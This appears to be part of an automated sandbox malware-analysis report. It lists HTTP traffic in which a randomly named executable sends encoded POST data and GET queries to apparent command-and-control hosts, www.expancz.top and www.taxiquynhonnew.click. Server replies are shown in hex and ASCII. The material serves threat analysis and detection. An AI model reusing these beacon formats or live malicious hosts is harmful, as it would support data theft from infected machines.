                                                            Data Ascii: BzI0pR=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                                                            Nov 25, 2024 10:51:31.856654882 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.949921107.155.56.30806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:32.976150036 CET821OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 219
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 42 7a 49 30 70 52 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 62 32 69 64 34 72 51 69 45 42 39 65 35 72 41 47 56 41 72 67 39 39 57 6d 77 57 31 51 3d 3d
                                                            Data Ascii: BzI0pR=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb2id4rQiEB9e5rAGVArg99WmwW1Q==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.949927107.155.56.30806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:35.753143072 CET1834OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1231
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 42 7a 49 30 70 52 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 36 76 69 6c 51 33 6a 30 4f 73 75 59 6b 51 78 31 4f 51 54 61 45 78 2b 74 6c 49 53 54 47 5a 2b 70 72 53 55 4e 79 66 48 6a 36 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 51 54 71 68 56 2b 35 38 37 2f 70 43 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 75 [TRUNCATED]
                                                            Data Ascii: BzI0pR=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h6vilQ3j0OsuYkQx1OQTaEx+tlISTGZ+prSUNyfHj6e2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9QTqhV+587/pCEpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn3sLqc2W9YO2bmev1EbZJLErjZUshp33FnmIpVt40VNIJqcMM+dCAbz7OoZQ/cG2298voQBhGYaW5EtFm4xSCoEi3L5vTQONjHZpaYx5yVWaDk0BSQ+0quPoSPCUxSBA7NRwMtR3aBYkJmeOUNyAQ1AX1TviyksQlJJizUgyGNfxbYgxdfjTtj9+9IXWJPBn7aTjAIRkw9C0YAW7iH86aLu89SS3QKBxW0vGZ/jn3tez/0LAeMGHhD9FHgQXVbMNl6GZQGmym9V3aiTK3JWS4/S0b4Sc/aVDqkBraNO5OYgNGm4ts+44WoSDmeo0UiVnAjemeL5JrPI33BOt+AuQcY8evS5e8aJynId14/V3NeG6JypWX2PPsBM12FWpVHFVejnMW+TdB2E+7AxoqbIaFg0HQ8l377+BlYp3Gt2Qsu9Fx45WIi1cTJjh52RDjx6WXsJtnt3wndA5bPQ1N4VhBnlSa0Om37pXy/kS7r4P9Bn1ShUKdRjDRp4ty3CKvevUPYcYOay2Lfml+rsHSV6LoezvkUEWvBsoNhaYujsX2jL254X4+8mBOBccxhBzHqOb/Kzv94DRivMHHxecS9CbagM [TRUNCATED]
                                                            Nov 25, 2024 10:51:37.297677994 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.949933107.155.56.30806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:38.406712055 CET534OUTGET /2gcl/?BzI0pR=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&Ap=KZH8jfU0 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 25, 2024 10:51:39.964409113 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Nov 25, 2024 10:51:39.964445114 CET1236INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Nov 25, 2024 10:51:39.964458942 CET1236INData Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Nov 25, 2024 10:51:39.964494944 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 6d 79 42 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 79 53 63 72 69 70 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20
                                                            Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                            Nov 25, 2024 10:51:39.964505911 CET1236INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 75 69 64 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 53 34 28 29 2b 53 34 28 29 2b 22 2d
                                                            Data Ascii: .toString(16).substring(1); } function guid() { return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4()); } if(!sessionStorage.sessionId) { sessionStorage.sessionId = guid(); }</script><script>if(localSt
                                                            Nov 25, 2024 10:51:39.964517117 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 6f 75 72 63 65 20 3d 3d 3d 20 73 6f 75 72 63 65 44 61 74 61 2e 74 69 6b 54 6f 6b 53 6f 75 72 63 65 29 20 7b 0a 20 20 20 20 20 20 21 20 66 75 6e 63 74 69 6f 6e 28 77
                                                            Data Ascii: } if(localStorage.source === sourceData.tikTokSource) { ! function(w, d, t) { w.TiktokAnalyticsObject = t; var ttq = w[t] = w[t] || []; ttq.methods = ["page", "track", "identify", "instances", "debug", "on
                                                            Nov 25, 2024 10:51:39.964524031 CET1236INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6f 2c 20 61 29 0a 20 20 20
                                                            Data Ascii: t.getElementsByTagName("script")[0]; a.parentNode.insertBefore(o, a) }; ttq.load(fb_id || 'C5T758KFMUHRC7DGN9U0'); ttq.track('PageView'); }(window, document, 'ttq'); } else { ttq = { tr
                                                            Nov 25, 2024 10:51:39.964673042 CET1236INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 70 29 7b 79 28 5b 70 5d 29 7d 3b 79 28 63 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 73 63 72 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 70 61 72 3d 73 63 72
                                                            Data Ascii: =function(p){y([p])};y(c)}catch(e){}};var scr=d.getElementsByTagName(t)[0],par=scr.parentNode;par.insertBefore(s,scr)})(window,document,"script","https://s.yimg.com/wi/ytc.js","dotq"); }</script><title></title><script>window.onload = funct
                                                            Nov 25, 2024 10:51:39.964687109 CET14INData Raw: 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.94995313.228.81.39806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:46.353514910 CET824OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 42 7a 49 30 70 52 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6b 45 57 41 2b 72 44 35 42 67 74 43 49 56 35 6d 71 75 53 6d 33 5a 63 67 5a 50 77 2f
                                                            Data Ascii: BzI0pR=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEWA+rD5BgtCIV5mquSm3ZcgZPw/
                                                            Nov 25, 2024 10:51:47.935400009 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 09:51:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.94995913.228.81.39806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:49.021966934 CET848OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 219
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 42 7a 49 30 70 52 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 63 48 65 6f 35 58 33 31 4e 6d 78 45 63 37 44 73 42 63 72 44 4d 6e 53 34 73 43 79 67 3d 3d
                                                            Data Ascii: BzI0pR=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHeo5X31NmxEc7DsBcrDMnS4sCyg==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.94996613.228.81.39806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:51.677752018 CET1861OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1231
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
